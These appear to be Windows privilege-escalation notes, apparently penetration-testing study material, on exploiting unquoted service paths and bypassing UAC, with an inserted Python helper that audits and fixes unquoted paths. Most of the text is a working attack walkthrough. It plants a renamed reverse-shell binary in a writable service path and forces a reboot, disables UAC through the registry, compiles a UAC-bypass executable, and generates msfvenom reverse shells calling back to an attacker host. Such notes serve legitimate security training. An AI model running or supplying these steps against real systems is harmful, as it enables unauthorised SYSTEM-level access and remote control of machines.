Unquoted Path Manual Exploitation

The classic case is a service binary installed under the C:\Program Files directory, which contains a space character in its name.


The binary path of each service can be found under the Services section of the WinPEAS output.

You can also list the services with:

net start
wmic service list brief
sc query
Services - Unquoted Paths

The path to the service binary is unquoted and contains spaces.
The service runs as LocalSystem or with equivalent administrative permissions.
The user has write permissions to a folder along the path.
The user has permission to start the service, OR the service auto-restarts on shutdown/start-up.
Find unquoted paths with WMIC:

Find all services with "auto" start mode (started automatically at system start-up), excluding those under C:\Windows and those whose path is already quoted:
cmd> wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
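As an added audit helper (not part of the original notes), the script below parses the CSV form of the WMIC query above (wmic service get name,pathname,startmode /format:csv), flags unquoted paths containing spaces, lists the spurious file names the loader probes before the real binary (which an audit must confirm users cannot create), and emits the sc config command that quotes the path. The sample WMIC output is constructed; treating the first space-delimited prefix ending in .exe as the binary is an assumption.

```python
# Constructed sample of `wmic service get name,pathname,startmode /format:csv` output.
SAMPLE_WMIC_CSV = """
Node,Name,PathName,StartMode
HOST1,AdminService,C:\\Program Files\\A bad folder\\adminservice.exe,Auto
HOST1,GoodService,"C:\\Program Files\\Good Vendor\\svc.exe" -run,Auto
HOST1,ArgsService,C:\\Program Files\\Vendor Tools\\svc.exe -config "a b.cfg",Manual
"""

def parse_wmic_csv(text):
    # Split by hand: WMIC does not escape quotes, so csv.reader would strip the quoting we need.
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Node,"):
            continue
        _node, name, rest = line.split(",", 2)
        pathname, startmode = rest.rsplit(",", 1)
        rows.append((name, pathname, startmode))
    return rows

def split_exe(pathname):
    # Binary = first space-delimited prefix ending in .exe (assumption); the rest is arguments.
    tokens = pathname.split(" ")
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        if prefix.lower().endswith(".exe"):
            return prefix, " ".join(tokens[i:])
    return pathname, ""

def spurious_candidates(exe):
    # Paths probed before the real binary: each space-split prefix plus .exe.
    tokens = exe.split(" ")
    return [" ".join(tokens[:i]) + ".exe" for i in range(1, len(tokens))]

def audit_services(text, skip_windows_dir=True):
    findings = []
    for name, pathname, startmode in parse_wmic_csv(text):
        if pathname.startswith('"'):
            continue  # already quoted: not affected
        exe, args = split_exe(pathname)
        if " " not in exe:
            continue  # no space, no ambiguity
        if skip_windows_dir and exe.lower().startswith("c:\\windows\\"):
            continue  # same filter as the WMIC one-liner above
        quoted = f'\\"{exe}\\"' + (" " + args.replace('"', '\\"') if args else "")
        findings.append({"service": name, "start_mode": startmode, "exe": exe,
                         "spurious": spurious_candidates(exe),
                         "fix_cmd": f'sc config {name} binPath= "{quoted}"'})
    return findings
```

Each finding's fix_cmd re-registers the service with a quoted binary path; run it from an elevated prompt and restart the service afterwards.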
Exploit steps:

Find unquoted service binary paths for services that run as ADMIN, e.g. binpath= C:\Program Files\A bad folder\adminservice.exe.

Check whether you have FULL/WRITE (F)(W) permissions along the path using:

a) icacls "C:\Program Files\folder\A unquoted folder\adminservice.exe"

b) accesschk.exe -ucqv [/path/to/unquoted/folder] -accepteula

Generate a reverse shell payload and rename it to match the path, e.g. A.exe.

Place the malicious binary in the path so that it is executed, e.g. move A.exe "C:\Program Files\folder".

Execute by restarting the computer (if the service has startmode = auto) with shutdown /r /t 0.

User Account Control (UAC) Bypass
Even if you are a local admin, User Account Control (UAC) may be turned on, which may force your user to respond to UAC credential/consent prompts in order to perform privileged actions.

UAC bypass walkthrough: https://ivanitlearning.wordpress.com/2019/07/07/bypassing-default-uac-settings-manually/
STEP 1: Check if we should perform UAC bypass

cmd> whoami /priv    # do we have very few privileges even as local admin?
cmd> whoami /groups  # is "Mandatory Label\XXX Mandatory Level" set to MEDIUM?
cmd> psexec.exe -i -accepteula -d -s rshell.exe # are we getting issues running psexec as SYSTEM?

# check if UAC turned on
cmd> reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System
EnableLUA                  REG_DWORD 0x1 # if 0x1 = UAC ENABLED
ConsentPromptBehaviorAdmin REG_DWORD 0x5 # if NOT 0x0 = consent required
PromptOnSecureDesktop      REG_DWORD 0x1 # if 0x1 = Force all credential/consent prompts

# try to disable UAC
cmd> reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD
STEP 2: Prepare exploits

# modify uac-bypass.c to execute reverse shell
# compile w/ correct architecture
$ x86_64-w64-mingw32-gcc ~/OSCP-2022/Tools/privesc-windows/uac-bypass.c -o uac-bypass.exe

# generate reverse shell payload
$ msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=[kali] LPORT=666 -f exe -o rshell.exe
STEP 3: Transfer, setup listener and exec payload

cmd> copy \\[kali]\[share]\uac-bypass.exe uac-bypass.exe
cmd> copy \\[kali]\[share]\rshell.exe rshell.exe
cmd> .\uac-bypass.exe

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -f exe > program.exe
